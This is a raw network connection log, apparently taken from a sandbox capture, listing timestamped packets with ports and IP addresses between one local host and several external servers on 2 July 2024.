Jul 2, 2024 00:05:08.108877897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108877897 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108891964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108902931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108905077 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108905077 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108911991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108922958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108932018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108942986 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108947992 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108953953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108963966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108967066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.108973980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108984947 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.108995914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109004974 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109010935 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109010935 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109014988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109025955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109035969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109040976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109040976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109086037 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109086037 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109533072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109544992 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109555960 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109566927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109575987 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109579086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109594107 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109596968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109608889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109617949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109622955 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109628916 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109637976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109648943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109659910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109661102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109661102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109694958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109694958 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.109944105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109955072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109965086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109976053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109985113 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.109994888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110003948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110011101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110011101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110013962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110023975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110043049 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110053062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110054016 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110070944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110081911 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110083103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110083103 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110093117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110102892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110114098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110125065 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110131025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110131025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110136986 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110148907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110160112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110167027 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110167027 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110169888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110179901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110191107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110207081 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110217094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110227108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110238075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110240936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110240936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110240936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110248089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110260010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110265017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110270023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110280991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110290051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110301971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110311985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110322952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110331059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110331059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110331059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110333920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110344887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110349894 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110359907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110371113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110388994 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110409975 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110451937 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110836029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110846996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110857010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110867977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110874891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110877991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110889912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110899925 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110909939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.110919952 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110919952 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110951900 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.110951900 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.122338057 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.122643948 CEST	49735	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.123485088 CEST	49734	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.123771906 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.123819113 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.133706093 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.133723021 CEST	80	49735	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.133788109 CEST	49735	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.135206938 CEST	80	49734	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.142005920 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142018080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142029047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142065048 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.142086983 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.142151117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142160892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142172098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142183065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.142195940 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.142210960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.142235994 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.148262024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.148416996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.148744106 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.148783922 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.149939060 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.150415897 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.155888081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.155960083 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.155967951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.155978918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.156023026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.156039000 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157449007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157481909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157500029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157507896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157509089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157510042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157548904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157603025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157614946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157625914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157636881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157706022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157706022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157785892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157795906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157805920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157816887 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157826900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157836914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157845974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157854080 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157862902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157875061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.157885075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157885075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157917023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.157917023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158020020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158030987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158040047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158050060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158060074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158070087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158080101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158082008 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158097029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158098936 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158108950 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158119917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158123016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158130884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158142090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158152103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158162117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158171892 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158171892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158171892 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158190012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158200979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158201933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158201933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158212900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158224106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158225060 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158255100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158288002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158356905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158368111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158379078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158390045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158401012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158411980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158420086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158430099 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158447981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158467054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158478022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158488035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158512115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158512115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158535957 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158662081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158673048 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158683062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158693075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158704042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158704996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158715963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158727884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158735991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158752918 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158752918 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158767939 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158806086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158823013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158833981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158843994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158854961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158864975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158874989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158880949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158885002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158895016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158899069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.158914089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158951044 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.158994913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159006119 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159017086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159028053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159038067 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159048080 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159054041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159063101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159066916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159066916 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159075022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159076929 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159092903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159106016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159254074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159264088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159280062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159290075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159300089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159312010 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159317017 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159324884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159357071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159368038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159378052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159378052 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159389019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159403086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159411907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159421921 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159432888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159437895 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159444094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159455061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159465075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159466028 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159466028 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159476042 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159476995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159503937 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159511089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159514904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159534931 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159548044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159559011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159569025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159579039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159593105 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159615993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159615993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159698009 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159708977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159719944 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159754992 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159785986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159796953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159806967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159807920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159817934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159828901 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159838915 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159895897 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159920931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159931898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159941912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159953117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.159975052 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.159987926 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160015106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160026073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160036087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160052061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160063028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160073042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160077095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160077095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160084963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160096884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160108089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160129070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160129070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160155058 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160258055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160269022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160279036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160289049 CEST	80	49717	77.91.77.80	192.168.2.6
